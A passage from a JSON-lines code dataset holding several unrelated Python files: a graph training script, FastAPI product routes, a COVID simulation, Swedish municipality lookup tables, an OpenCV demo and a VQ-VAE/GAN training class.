raise ValueError('Profile not found in graph')\n\n write_file = open(os.path.join(args.path, 'data/graph'), 'wb')\n pickle.dump(graph, write_file)\n write_file.close()\n\nif args.train:\n while True:\n for i in range(args.iterations):\n graph_iterator.next()\n print('ITERATION: {}'.format(i))\n print('Progress: {} %'.format((1 + i) / args.iterations * 100))\n print('Graph Size: {}'.format(len(graph_iterator.nodes.keys())))\n print('------------')\n\n pbd_iterator = pbditerator.PbdGraphIterator(graph_iterator)\n pbd_iterator(iterations=int(args.pbditer))\n\n write_file = open(os.path.join(args.path, 'data/graph'), 'wb')\n pickle.dump(pbd_iterator.graph, write_file)\n write_file.close()\n render(pbd_iterator.graph)\n\n for i in range(args.featureiter):\n keys = list(graph.nodes.keys())\n pick_random_index = np.random.randint(low=0, high=len(keys)-1)\n random_node = graph.nodes[keys[pick_random_index]]\n\n profiler = MSProfileUser(name=random_node.screen_name, graph=graph)\n maxlikelihood = profiler(samples=args.mcsamples, fsamples=args.fmcsamples, search_connection=args.con)\n\n if maxlikelihood:\n print(' ------------ ')\n print('Setting feature for: ', random_node.name, 'with:', maxlikelihood)\n random_node.set_party(maxlikelihood)\n\n write_file = open(os.path.join(args.path, 'data/graph'), 'wb')\n pickle.dump(graph, write_file)\n write_file.close()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"asgerMe/SocialNetworkSegmentation","sub_path":"source/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41284381516","text":"from fastapi import APIRouter,status, Depends, HTTPException\nfrom src.schemas.schemas import Produto, ProdutoOut,ProdutoEditar,ProdutoSimples, Usuario\nfrom src.infra.sqlalchemy.repositorios.repositorioProduto import RepositorioProduto\nfrom sqlalchemy.orm import Session\nfrom typing import List\nfrom src.infra.sqlalchemy.config.database import get_db \nfrom src.routers.auth_utils import obter_usuario_logado\n\nrouter = APIRouter()\n\n@router.post('/produtos',status_code=status.HTTP_201_CREATED,response_model=ProdutoOut)\ndef criar_produto(produto: Produto,usuario = Depends(obter_usuario_logado), db:Session = Depends(get_db)):\n produto.usuario_id =usuario.id\n produto_criado = RepositorioProduto(db).criar(produto)\n return produto_criado\n\n\n@router.get('/produtos',status_code=status.HTTP_200_OK, response_model=List[ProdutoOut])\ndef listar_produto(db:Session = Depends(get_db)):\n produto_listar = RepositorioProduto(db).listar()\n return produto_listar\n\n@router.put('/produtos/{id}',response_model=ProdutoSimples)\ndef atualizar_produto(id:int,produto: ProdutoEditar, session :Session = Depends(get_db)):\n RepositorioProduto(session).editar(id,produto)\n produto.id =id\n return produto\n\n@router.delete('/produtos/{id}')\ndef remover_produto(id:int, session :Session = Depends(get_db)):\n RepositorioProduto(session).remover(id)\n return {\"Produto\":\"Removido com Sucesso\"}\n\n@router.get('/meus_produtos',response_model=list[ProdutoOut])\ndef exibr_produto_Id(usuario: Usuario = Depends(obter_usuario_logado), session: Session=Depends(get_db)):\n produto_localizado = RepositorioProduto(session).buscarPorId(usuario.id)\n if not produto_localizado:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail = f'Não há um produto com id = {id}')\n return produto_localizado\n\n","repo_name":"KarMiguel/FastApi-Python-BLX","sub_path":"src/routers/rotas_produtos.py","file_name":"rotas_produtos.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"24505487608","text":"import requests\nfrom requests.auth import HTTPBasicAuth\n\nurl_employee = \"http://dummy.restapiexample.com/api/v1/employee/9\"\nr = requests.get(url = url_employee,headers ={'User-Agent': 'Bhatti'})\ndata = r.json()\n\n# print(r.status_code)\n# print(r)\n#\n# print(data['status'])\n# print(data['data'])\n\nfor status in data:\n print (status)","repo_name":"zulqurnainbhatti/oldrepo","sub_path":"employee_get.py","file_name":"employee_get.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7789149803","text":"\"\"\"Functions used for the simulations\"\"\"\n\nimport numpy as np\n\nfrom covid.config import MAX_X\nfrom covid.model import Patient, Virus\n\n\ndef new_patients(\n n,\n mortality_thresh=0.95,\n isolate_thresh=0.5,\n vel_std=0.1,\n severity_score_mean=0.1,\n severity_score_std=0.4,\n infection_length_mean=19,\n infection_length_std=3.0,\n infection_prob_mean=1.0,\n infection_prob_std=1.0,\n proactive_isolate_frac=0.0,\n **kwargs,\n):\n \"\"\"\n returns a list of new Patients. Parameters are determined by statistical distributions:\n - velocity and infection length, are normal distributions\n - severity and infection prob are the absolute value of a normal distributions clipped to the range [0, 1]\n - x, y coordinates of initial position are normal clipped to the dimensions of the box\n\n Parameters\n ----------\n n : int\n num people\n mortality_thresh : float (0->1)\n threshold for death\n isolate_thresh : float (0->1)\n threshold before a person self-isolates\n vel_std : float\n standard deviation of persons velocity\n severity_score_mean : float (0->1)\n determines the magnitude of how severe the average case is\n severity_score_std : float\n standard deviation of the above\n infection_length_mean : float\n determines how long an average case is\n infection_length_std : float\n standard deviation of the above\n infection_prob_mean : float (0->1)\n determines the average infection probability on contact between\n a suceptible and an infected person is.\n infection_prob_std : float\n standard deviation of the above\n proactive_isolate_frac : float (0->1)\n fraction of people who proactively self-isolate by staying in place.\n a fraction of these people can interact with people who approach them\n but the rest do not interact at all.\n\n Returns\n -------\n List[Patient]\n\n \"\"\"\n pos = 2 * MAX_X * np.random.random_sample(size=(n, 2)) - MAX_X\n vel = np.random.normal(loc=0, scale=vel_std, size=(n, 2))\n infect_len = np.fabs(\n np.random.normal(loc=infection_length_mean, scale=infection_length_std, size=n)\n )\n\n proactive_isolate = np.random.choice(\n [True, False], p=[proactive_isolate_frac, 1.0 - proactive_isolate_frac], size=n\n )\n\n _severity = np.fabs(np.random.normal(loc=severity_score_mean, scale=severity_score_std, size=n))\n severity = np.clip(_severity, 0.0, 1.0)\n\n _infect = np.fabs(np.random.normal(loc=infection_prob_mean, scale=infection_prob_std, size=n))\n infection_prob = np.clip(_infect, 0.0, 1.0)\n infections = [\n Virus(\n infection_severity=severity[i],\n infection_length=infect_len[i],\n infection_prob=infection_prob[i],\n active=False,\n immune=False,\n )\n for i in range(n)\n ]\n return [\n Patient(\n x=pos[i][0],\n y=pos[i][1],\n vx=vel[i][0],\n vy=vel[i][1],\n infection=infections[i],\n mortality_thresh=mortality_thresh,\n isolate_thresh=isolate_thresh,\n isolate_behavior=proactive_isolate[i],\n )\n for i in range(n)\n ]\n\n\ndef add_remove_patients(num_new, num_remove, patients, **kwargs):\n \"\"\"\n Add and remove patients\n\n Parameters\n ----------\n num_new : int\n num_remove : int\n patients : List[Patient]\n\n Other Parameters\n ----------------\n outside_infections: int (default nun_new // 100)\n new infections coming from newly added people\n\n Returns\n -------\n List[Patient]\n \"\"\"\n # extend the list with new patients\n if num_new > 0:\n new_people = new_patients(num_new, **kwargs)\n n_infect = kwargs.get(\"outside_infections\", num_new // 100)\n randomly_infect(new_people, n_infect)\n patients.extend(new_people)\n # remove some patients\n if num_remove > 0:\n np.random.shuffle(patients)\n patients = [x for i, x in enumerate(patients) if i > num_remove or x.is_dead]\n return patients\n\n\ndef randomly_infect(patient_lst, n_infect):\n \"\"\"\n randomly infect elements of a list\n\n Parameters\n ----------\n patient_lst : List[Patient]\n n_infect : int\n\n Returns\n -------\n None\n \"\"\"\n for i in range(n_infect):\n patient_lst[i].infection.infect()\n","repo_name":"MENZI-MCHUNU/covid19","sub_path":"covid/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"27919436704","text":"CITYS = [\n \"alingsås\",\n \"arboga\",\n \"arvika\",\n \"askersund\",\n \"avesta\",\n \"boden\",\n \"bollnäs\",\n \"borgholm\",\n \"borlänge\",\n \"borås\",\n \"vänersborgs stad\",\n \"båstad\",\n \"kristianstads län\",\n \"djursholm \",\n \"eksjö\",\n \"enköping\",\n \"eskilstuna\",\n \"eslöv\",\n \"fagersta\",\n \"falkenberg\",\n \"falköping\",\n \"skanör med falsterbo stad\",\n \"falun\",\n \"filipstad\",\n \"flen\",\n \"gränna\",\n \"gävle\",\n \"göteborg\",\n \"hagfors\",\n \"halmstad\",\n \"haparanda\",\n \"hedemora\",\n \"helsingborg\",\n \"hjo\",\n \"hudiksvall\",\n \"huskvarna\",\n \"härnösand\",\n \"hässleholm\",\n \"kristianstads län\",\n \"höganäs\",\n \"jönköping\",\n \"kalmar\",\n \"karl johans stad\",\n \"karlshamn\",\n \"karlskoga\",\n \"karlskrona\",\n \"karlstad\",\n \"katrineholm\",\n \"kiruna\",\n \"kramfors\",\n \"kristianstad\",\n \"kristianstads län\",\n \"kristinehamn\",\n \"kumla\",\n \"kungsbacka\",\n \"kungälv\",\n \"köping\",\n \"laholm\",\n \"landskrona\",\n \"lidingö\",\n \"lidköping\",\n \"lindesberg\",\n \"linköping\",\n \"ljungby\",\n \"ludvika\",\n \"luleå\",\n \"lund\",\n \"kristianstads län\",\n \"lycksele\",\n \"lysekil\",\n \"malmö\",\n \"mariefred\",\n \"mariestad\",\n \"marstrand\",\n \"mjölby\",\n \"motala\",\n \"mölndal\",\n \"mönsterås\",\n \"nacka\",\n \"nora\",\n \"norrköping\",\n \"norrtälje\",\n \"nybro\",\n \"nyköping\",\n \"nynäshamn\",\n \"nässjö\",\n \"oskarshamn\",\n \"oxelösund\",\n \"piteå\",\n \"ronneby\",\n \"sala\",\n \"sandviken\",\n \"sigtuna\",\n \"simrishamn\",\n \"kristianstads län\",\n \"skanör med falsterbo stad\",\n \"skanör med falsterbo\",\n \"skara\",\n \"skellefteå\",\n \"skänninge\",\n \"skövde\",\n \"sollefteå\",\n \"solna\",\n \"stockholm\",\n \"strängnäs\",\n \"strömstad\",\n \"sundbyberg\",\n \"sundsvall\",\n \"säffle\",\n \"säter\",\n \"sävsjö\",\n \"söderhamn\",\n \"söderköping\",\n \"södertälje\",\n \"sölvesborg\",\n \"tidaholm\",\n \"torget\",\n \"torshälla\",\n \"tranås\",\n \"trelleborg\",\n \"trollhättan\",\n \"trosa\",\n \"kristianstads län\",\n \"uddevalla\",\n \"ulricehamn\",\n \"umeå\",\n \"uppsala\",\n \"vadstena\",\n \"varberg\",\n \"vaxholm\",\n \"vetlanda\",\n \"vimmerby\",\n \"visby\",\n \"kristianstads län\",\n \"kristianstads kommun\",\n \"vänersborg\",\n \"värnamo\",\n \"västervik\",\n \"västerås\",\n \"växjö\",\n \"ystad\",\n \"kristianstads län\",\n \"kristianstads kommun\",\n \"åmål\",\n \"älvsborg\",\n \"ängelholm\",\n \"kristianstads län\",\n \"örebro\",\n \"öregrund\",\n \"örnsköldsvik\",\n \"östersund\",\n \"östhammar\"\n]\n\nFA_REGION = [\n \"malmö\",\n \"lund\",\n \"vansbro\",\n \"kristianstad\"\n \"hässleholm\",\n \"ludvika\",\n \"karlskrona\",\n \"avesta\",\n \"hedemora\",\n \"älmhult\",\n \"osby\",\n \"falun\",\n \"borlänge\",\n \"ljungby\",\n \"mora\",\n \"halmstad\",\n \"gävle\",\n \"värnamo\",\n \"bollnäs\",\n \"ovanåker\",\n \"växjö\",\n \"hudiksvall\",\n \"kalmar\",\n \"ljusdal\",\n \"oskarshamn\",\n \"härjedalen\",\n \"västervik\",\n \"östersund\",\n \"vimmerby\",\n \"sundsvall\",\n \"jönköping\",\n \"kramfors\",\n \"borås\",\n \"örnsköldsvik\",\n \"göteborg\",\n \"sollefteå\",\n \"trollhättan\",\n \"vänersborg\",\n \"strömsund\",\n \"lidköping\",\n \"götene\",\n \"åsele\",\n \"skövde\",\n \"skara\",\n \"umeå\",\n \"linköping\",\n \"norrköping\",\n \"lycksele\",\n \"gotland\",\n \"vilhelmina\",\n \"nyköping\",\n \"oxelösund\",\n \"storuman\",\n \"eskilstuna\",\n \"skellefteå\",\n \"stockholm\",\n \"arvidsjaur\",\n \"västerås\",\n \"arjeplog\",\n \"örebro\",\n \"luleå\",\n \"karlskoga\",\n \"haparanda\",\n \"karlstad\",\n \"överkalix\",\n \"västlandet\",\n \"jokkmokk\",\n \"torsby\",\n \"gällivare\",\n \"malung\",\n \"sälen\",\n \"kiruna\",\n]\n\nMUNICIPALITY_TO_FA = {\n \"svalöv\": \"malmö-lund\",\n \"staffanstorp\": \"malmö-lund\",\n \"burlöv\": \"malmö-lund\",\n \"vellinge\": \"malmö-lund\",\n \"örkelljunga\": \"malmö-lund\",\n \"bjuv\": \"malm��-lund\",\n \"kävlinge\": \"malmö-lund\",\n \"lomma\": \"malmö-lund\",\n \"svedala\": \"malmö-lund\",\n \"skurup\": \"malmö-lund\",\n \"sjöbo\": \"malmö-lund\",\n \"hörby\": \"malmö-lund\",\n \"höör\": \"malmö-lund\",\n \"tomelilla\": \"malmö-lund\",\n \"perstorp\": \"malmö-lund\",\n \"klippan\": \"malmö-lund\",\n \"åstorp\": \"malmö-lund\",\n \"båstad\": \"malmö-lund\",\n \"malmö\": \"malmö-lund\",\n \"lund\": \"malmö-lund\",\n \"landskrona\": \"malmö-lund\",\n \"helsingborg\": \"malmö-lund\",\n \"höganäs\": \"malmö-lund\",\n \"eslöv\": \"malmö-lund\",\n \"ystad\": \"malmö-lund\",\n \"trelleborg\": \"malmö-lund\",\n \"simrishamn\": \"malmö-lund\",\n \"ängelholm\": \"malmö-lund\",\n \"sölvesborg\": \"kristianstad-hässleholm\",\n \"östra göinge\": \"kristianstad-hässleholm\",\n \"bromölla\": \"kristianstad-hässleholm\",\n \"kristianstad\": \"kristianstad-hässleholm\",\n \"hässleholm\": \"kristianstad-hässleholm\",\n \"olofström\": \"karlskrona\",\n \"karlskrona\": \"karlskrona\",\n \"ronneby\": \"karlskrona\",\n \"karlshamn\": \"karlskrona\",\n \"älmhult\": \"älmhult-osby\",\n \"osby\": \"älmhult-osby\",\n \"ljungby\": \"ljungby\",\n \"markaryd\": \"ljungby\",\n \"hylte\": \"halmstad\",\n \"halmstad\": \"halmstad\",\n \"laholm\": \"halmstad\",\n \"gnosjö\": \"värnamo\",\n \"gislaved\": \"värnamo\",\n \"värnamo\": \"värnamo\",\n \"uppvidinge\": \"växjö\",\n \"lessebo\": \"växjö\",\n \"tingsryd\": \"växjö\",\n \"växjö\": \"växjö\",\n \"torsås\": \"kalmar\",\n \"mörbylånga\": \"kalmar\",\n \"mönsterås\": \"kalmar\",\n \"emmaboda\": \"kalmar\",\n \"kalmar\": \"kalmar\",\n \"nybro\": \"kalmar\",\n \"borgholm\": \"kalmar\",\n \"högsby\": \"oskarshamn\",\n \"oskarshamn\": \"oskarshamn\",\n \"västervik\": \"västervik\",\n \"hultsfred\": \"vimmerby\",\n \"vimmerby\": \"vimmerby\",\n \"ydre\": \"jönköping\",\n \"aneby\": \"jönköping\",\n \"mullsjö\": \"jönköping\",\n \"habo\": \"jönköping\",\n \"vaggeryd\": \"jönköping\",\n \"jönköping\": \"jönköping\",\n \"nässjö\": \"jönköping\",\n \"sävsjö\": \"jönköping\",\n \"vetlanda\": \"jönköping\",\n \"eksjö\": \"jönköping\",\n \"tranås\": \"jönköping\",\n \"borås\": \"borås\",\n \"tranemo\": \"borås\",\n \"svenljunga\": \"borås\",\n \"ulricehamn\": \"borås\",\n \"falkenberg\": \"göteborg\",\n \"varberg\": \"göteborg\",\n \"kungsbacka\": \"göteborg\",\n \"härryda\": \"göteborg\",\n \"partille\": \"göteborg\",\n \"öckerö\": \"göteborg\",\n \"stenungsund\": \"göteborg\",\n \"tjörn\": \"göteborg\",\n \"orust\": \"göteborg\",\n \"ale\": \"göteborg\",\n \"lerum\": \"göteborg\",\n \"vargårda\": \"göteborg\",\n \"bollebygd\": \"göteborg\",\n \"lilla edet\": \"göteborg\",\n \"mark\": \"göteborg\",\n \"herrljunga\": \"göteborg\",\n \"göteborg\": \"göteborg\",\n \"mölndal\": \"göteborg\",\n \"kungälv\": \"göteborg\",\n \"alingssås\": \"göteborg\",\n \"sotenäs\": \"trollhättan-vänersborg\",\n \"munkedal\": \"trollhättan-vänersborg\",\n \"färgelanda\": \"trollhättan-vänersborg\",\n \"grästorp\": \"trollhättan-vänersborg\",\n \"mellerud\": \"trollhättan-vänersborg\",\n \"lysekil\": \"trollhättan-vänersborg\",\n \"uddevalla\": \"trollhättan-vänersborg\",\n \"vänersborg\": \"trollhättan-vänersborg\",\n \"trollhättan\": \"trollhättan-vänersborg\",\n \"essunga\": \"lidköping-götene\",\n \"vara\": \"lidköping-götene\",\n \"götene\": \"lidköping-götene\",\n \"lidköping\": \"lidköping-götene\",\n \"karlsborg\": \"skövde-skara\",\n \"gullspång\": \"skövde-skara\",\n \"tibro\": \"skövde-skara\",\n \"töreboda\": \"skövde-skara\",\n \"mariestad\": \"skövde-skara\",\n \"skara\": \"skövde-skara\",\n \"skövde\": \"skövde-skara\",\n \"hjo\": \"skövde-skara\",\n \"tidaholm\": \"skövde-skara\",\n \"falköping\": \"skövde-skara\",\n \"ödeshög\": \"linköping-norrköping\",\n \"kinda\": \"linköping-norrköping\",\n \"boxholm\": \"linköping-norrköping\",\n \"åtvidaberg\": \"linköping-norrköping\",\n \"finspång\": \"linköping-norrköping\",\n \"valdemarsvik\": \"linköping-norrköping\",\n \"linköping\": \"linköping-norrköping\",\n \"norrköping\": \"linköping-norrköping\",\n \"söderköping\": \"linköping-norrköping\",\n \"motala\": \"linköping-norrköping\",\n \"vadstena\": \"linköping-norrköping\",\n \"mjölby\": \"linköping-norrköping\",\n \"gotland\": \"gotland\",\n \"nyköping\": \"nyköping-oxelösund\",\n \"oxelösund\": \"nyköping-oxelösund\",\n \"vingåker\": \"eskilstuna\",\n \"katrineholm\": \"eskilstuna\",\n \"eskilstuna\": \"eskilstuna\",\n \"upplands väsby\": \"stockholm\",\n \"vallentuna\": \"stockholm\",\n \"österåker\": \"stockholm\",\n \"värmdö\": \"stockholm\",\n \"järfälla\": \"stockholm\",\n \"ekerö\": \"stockholm\",\n \"huddinge\": \"stockholm\",\n \"botkyrka\": \"stockholm\",\n \"salem\": \"stockholm\",\n \"haninge\": \"stockholm\",\n \"tyresö\": \"stockholm\",\n \"upplands-bro\": \"stockholm\",\n \"nykvarn\": \"stockholm\",\n \"täby\": \"stockholm\",\n \"danderyd\": \"stockholm\",\n \"sollentuna\": \"stockholm\",\n \"stockholm\": \"stockholm\",\n \"södertälje\": \"stockholm\",\n \"nacka\": \"stockholm\",\n \"sundbyberg\": \"stockholm\",\n \"solna\": \"stockholm\",\n \"lidingö\": \"stockholm\",\n \"vaxholm\": \"stockholm\",\n \"norrtälje\": \"stockholm\",\n \"sigtuna\": \"stockholm\",\n \"nynäshamn\": \"stockholm\",\n \"håbo\": \"stockholm\",\n \"knivsta\": \"stockholm\",\n \"heby\": \"stockholm\",\n \"tierp\": \"stockholm\",\n \"uppsala\": \"stockholm\",\n \"enköping\": \"stockholm\",\n \"östhammar\": \"stockholm\",\n \"gnesta\": \"stockholm\",\n \"flen\": \"stockholm\",\n \"strängnäs\": \"stockholm\",\n \"trosa\": \"stockholm\",\n \"skinnskatteberg\": \"västerås\",\n \"surahammar\": \"västerås\",\n \"kungsör\": \"västerås\",\n \"hallstahammar\": \"västerås\",\n \"norberg\": \"västerås\",\n \"västerås\": \"västerås\",\n \"sala\": \"västerås\",\n \"fagersta\": \"västerås\",\n \"köping\": \"västerås\",\n \"arboga\": \"västerås\",\n \"lekeberg\": \"örebro\",\n \"laxå\": \"örebro\",\n \"hallsberg\": \"örebro\",\n \"hällefors\": \"örebro\",\n \"ljusnarsberg\": \"örebro\",\n \"örebro\": \"örebro\",\n \"kumla\": \"örebro\",\n \"askersund\": \"örebro\",\n \"nora\": \"örebro\",\n \"lindesberg\": \"örebro\",\n \"degerfors\": \"karlskoga\",\n \"karlskoga\": \"karlskoga\",\n \"åmål\": \"karlstad\",\n \"kil\": \"karlstad\",\n \"storfors\": \"karlstad\",\n \"hammarö\": \"karlstad\",\n \"munkfors\": \"karlstad\",\n \"forshaga\": \"karlstad\",\n \"grums\": \"karlstad\",\n \"sunne\": \"karlstad\",\n \"karlstad\": \"karlstad\",\n \"kristinehamn\": \"karlstad\",\n \"filipstad\": \"karlstad\",\n \"hagfors\": \"karlstad\",\n \"arvika\": \"karlstad\",\n \"säffle\": \"karlstad\",\n \"tanum\": \"västlandet\",\n \"dals-ed\": \"västlandet\",\n \"bengtsfors\": \"västlandet\",\n \"strömstad\": \"västlandet\",\n \"eda\": \"västlandet\",\n \"årjäng\": \"västlandet\",\n \"torsby\": \"torsby\",\n \"malung\": \"malung-sälen\",\n \"sälen\": \"malung-sälen\",\n \"vansbro\": \"vansbro\",\n \"smedjebacken\": \"ludvika\",\n \"ludvika\": \"ludvika\",\n \"hedemora\": \"avesta-hedemora\",\n \"avesta\": \"avesta-hedemora\",\n \"gagnef\": \"falun-borlänge\",\n \"leksand\": \"falun-borlänge\",\n \"rättvik\": \"falun-borlänge\",\n \"falun\": \"falun-borlänge\",\n \"borlänge\": \"falun-borlänge\",\n \"säter\": \"falun-borlänge\",\n \"orsa\": \"mora\",\n \"älvdalen\": \"mora\",\n \"mora\": \"mora\",\n \"älvkarleby\": \"gävle\",\n \"ockelbo\": \"gävle\",\n \"hofors\": \"gävle\",\n \"gävle\": \"gävle\",\n \"sandviken\": \"gävle\",\n \"ovanåker\": \"bollnäs-ovanåker\",\n \"söderhamn\": \"bollnäs-ovanåker\",\n \"bollnäs\": \"bollnäs-ovanåker\",\n \"nordanstrig\": \"hudiksvall\",\n \"hudiksvall\": \"hudiksvall\",\n \"ljusdal\": \"ljusdal\",\n \"härjedalen\": \"härjedalen\",\n \"ragunda\": \"östersund\",\n \"bräcke\": \"östersund\",\n \"krokom\": \"östersund\",\n \"åre\": \"östersund\",\n \"berg\": \"östersund\",\n \"östersund\": \"östersund\",\n \"ånge\": \"sundsvall\",\n \"timrå\": \"sundsvall\",\n \"härnösand\": \"sundsvall\",\n \"sundsvall\": \"sundsvall\",\n \"kramfors\": \"kramfors\",\n \"örnsköldsvik\": \"örnsköldsvik\",\n \"sollefteå\": \"sollefteå\",\n \"strömsund\": \"strömsund\",\n \"dorotea\": \"strömsund\",\n \"åsele\": \"åsele\",\n \"nordmaling\": \"umeå\",\n \"bjurholm\": \"umeå\",\n \"vindeln\": \"umeå\",\n \"robertsfors\": \"umeå\",\n \"vännäs\": \"umeå\",\n \"umeå\": \"umeå\",\n \"lycksele\": \"lycksele\",\n \"malå\": \"lycksele\",\n \"villhelmina\": \"villhelmina\",\n \"storuman\": \"storuman\",\n \"skellefteå\": \"skellefteå\",\n \"norsjö\": \"skellefteå\",\n \"arvidsjaur\": \"arvidsjaur\",\n \"sorsele\": \"arjeplog\",\n \"arjeplog\": \"arjeplog\",\n \"kalix\": \"luleå\",\n \"övertorneå\": \"luleå\",\n \"älvsbyn\": \"luleå\",\n \"luleå\": \"luleå\",\n \"piteå\": \"luleå\",\n \"boden\": \"luleå\",\n \"haparanda\": \"haparanda\",\n \"överkalix\": \"överkalix\",\n \"jokkmokk\": \"jokkmokk\",\n \"gällivare\": \"gällivare\",\n \"kiruna\": \"kiruna\",\n \"pajala\": \"kiruna\",\n}\n\nBLACKLIST = [\"svenska\", \"engelska\", \"can\", \"design\", \"data\", \"förvaltning\", \"verktyg\", \"högskoleutbildning\", \"eftergymnasial utbildning\", \"kommunikation\", \"problemlösning\", \"tekniker\", \"general\", \"manager\", \"major\", \"mentor\", \"programmering\", \"egen bil\", \"barn\", \"back end\", \"front end\", \"not\", \"projektledning\", \"eftergymnasial utbildning\", \"miljö\", \"körkort\", \"leverantörer\", \"script\", \"stack\", \"Svenskt medborgarskap\", \"affärssystem\", \"budget\", \"sales\", \"religion\", \"client\", \"tekniker\", \"ingenjör\", \"personalansvarig\", \"project manager\", \"arkitekt\", \"förvaltare\", \"traffic\", \"diskrimineringsombudsman\", \"arbetslivserfarenhet\"]\n","repo_name":"Assedon-AB/digitalskills-data","sub_path":"digspec/static_data.py","file_name":"static_data.py","file_ext":"py","file_size_in_byte":12968,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25625116723","text":"from deel import *\nfrom deel.network import *\nfrom deel.network.googlenet import *\nfrom deel.commands import *\nimport cv2\n\ndeel = Deel()\n\nCNN = GoogLeNet()\n\ncam = cv2.VideoCapture(0) \n\nwhile True:\n\tret, img = cam.read() \n\tCNN.Input(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n\tCNN.classify()\n\tShowLabels()\n\n\tcv2.imshow('cam', img)\n\tif cv2.waitKey(10) > 0:\n\t\tbreak\ncam.release()\ncv2.destroyAllWindows()\n","repo_name":"ghelia/deel","sub_path":"examples/openCV.py","file_name":"openCV.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"75"} +{"seq_id":"1083240814","text":"class Solution:\n def mctFromLeafValues(self, arr) -> int:\n res = 0\n for i in range(0, len(arr)-1):\n mn = arr.index(min(arr))\n if 0 self.disc_start_step:\n self.disc_optimizer.zero_grad()\n d_loss.backward()\n self.disc_optimizer.step()\n\n def top_encode(self, x, mask):\n h = self.top_encoder(x)\n h = self.top_quant_conv(h)\n quant, _, _ = self.top_quantize(h, mask)\n quant = self.top_post_quant_conv(quant)\n return quant\n\n def bot_encode(self, x, mask):\n h = self.bot_encoder(x)\n h = self.bot_quant_conv(h)\n quant, emb_loss, info = self.bot_quantize(h, mask)\n quant = self.bot_post_quant_conv(quant)\n bot_dec_res = self.bot_decoder_res(quant)\n return bot_dec_res, emb_loss, info\n\n def decode(self, quant_top, bot_dec_res):\n dec = self.decoder(quant_top, bot_h=bot_dec_res)\n return dec\n\n def forward_step(self, input, mask):\n with torch.no_grad():\n quant_top = self.top_encode(input, mask)\n bot_dec_res, diff, _ = self.bot_encode(input, mask)\n dec = self.decode(quant_top, bot_dec_res)\n return dec, diff\n\n def feed_data(self, data):\n x = data['image'].float().to(self.device)\n mask = data['texture_mask'].float().to(self.device)\n\n return x, mask\n\n def training_step(self, data, step):\n x, mask = self.feed_data(data)\n xrec, codebook_loss = self.forward_step(x, mask)\n\n # get recon/perceptual loss\n recon_loss = torch.abs(x.contiguous() - xrec.contiguous())\n p_loss = self.perceptual(x.contiguous(), xrec.contiguous())\n nll_loss = recon_loss + self.perceptual_weight * p_loss\n nll_loss = torch.mean(nll_loss)\n\n # augment for input to discriminator\n if self.diff_aug:\n xrec = DiffAugment(xrec, policy=self.policy)\n\n # update generator\n logits_fake = self.disc(xrec)\n g_loss = -torch.mean(logits_fake)\n last_layer = self.decoder.conv_out.weight\n d_weight = calculate_adaptive_weight(nll_loss, g_loss, last_layer,\n self.disc_weight_max)\n d_weight *= adopt_weight(1, step, self.disc_start_step)\n loss = nll_loss + d_weight * g_loss + codebook_loss\n\n self.log_dict[\"loss\"] = loss\n self.log_dict[\"l1\"] = recon_loss.mean().item()\n self.log_dict[\"perceptual\"] = p_loss.mean().item()\n self.log_dict[\"nll_loss\"] = nll_loss.item()\n self.log_dict[\"g_loss\"] = g_loss.item()\n self.log_dict[\"d_weight\"] = d_weight\n self.log_dict[\"codebook_loss\"] = codebook_loss.item()\n\n if step > self.disc_start_step:\n if self.diff_aug:\n logits_real = self.disc(\n DiffAugment(x.contiguous().detach(), policy=self.policy))\n else:\n logits_real = self.disc(x.contiguous().detach())\n logits_fake = self.disc(xrec.contiguous().detach(\n )) # detach so that generator isn\"t also updated\n d_loss = hinge_d_loss(logits_real, logits_fake)\n self.log_dict[\"d_loss\"] = d_loss\n else:\n d_loss = None\n\n return loss, d_loss\n\n @torch.no_grad()\n def inference(self, data_loader, save_dir):\n self.bot_encoder.eval()\n self.bot_decoder_res.eval()\n self.decoder.eval()\n self.bot_quantize.eval()\n self.bot_quant_conv.eval()\n self.bot_post_quant_conv.eval()\n\n loss_total = 0\n num = 0\n\n for _, data in enumerate(data_loader):\n img_name = data['img_name'][0]\n x, mask = self.feed_data(data)\n xrec, _ = self.forward_step(x, mask)\n\n recon_loss = torch.abs(x.contiguous() - xrec.contiguous())\n p_loss = self.perceptual(x.contiguous(), xrec.contiguous())\n nll_loss = recon_loss + self.perceptual_weight * p_loss\n nll_loss = torch.mean(nll_loss)\n loss_total += nll_loss\n\n num += x.size(0)\n\n if x.shape[1] > 3:\n # colorize with random projection\n assert xrec.shape[1] > 3\n # convert logits to indices\n xrec = torch.argmax(xrec, dim=1, keepdim=True)\n xrec = F.one_hot(xrec, num_classes=x.shape[1])\n xrec = xrec.squeeze(1).permute(0, 3, 1, 2).float()\n x = self.to_rgb(x)\n xrec = self.to_rgb(xrec)\n\n img_cat = torch.cat([x, xrec], dim=3).detach()\n img_cat = ((img_cat + 1) / 2)\n img_cat = img_cat.clamp_(0, 1)\n save_image(\n img_cat, f'{save_dir}/{img_name}.png', nrow=1, padding=4)\n\n return (loss_total / num).item()\n\n def get_current_log(self):\n return self.log_dict\n\n def update_learning_rate(self, epoch):\n \"\"\"Update learning rate.\n\n Args:\n current_iter (int): Current iteration.\n warmup_iter (int): Warmup iter numbers. -1 for no warmup.\n Default: -1.\n \"\"\"\n lr = self.optimizer.param_groups[0]['lr']\n\n if self.opt['lr_decay'] == 'step':\n lr = self.opt['lr'] * (\n self.opt['gamma']**(epoch // self.opt['step']))\n elif self.opt['lr_decay'] == 'cos':\n lr = self.opt['lr'] * (\n 1 + math.cos(math.pi * epoch / self.opt['num_epochs'])) / 2\n elif self.opt['lr_decay'] == 'linear':\n lr = self.opt['lr'] * (1 - epoch / self.opt['num_epochs'])\n 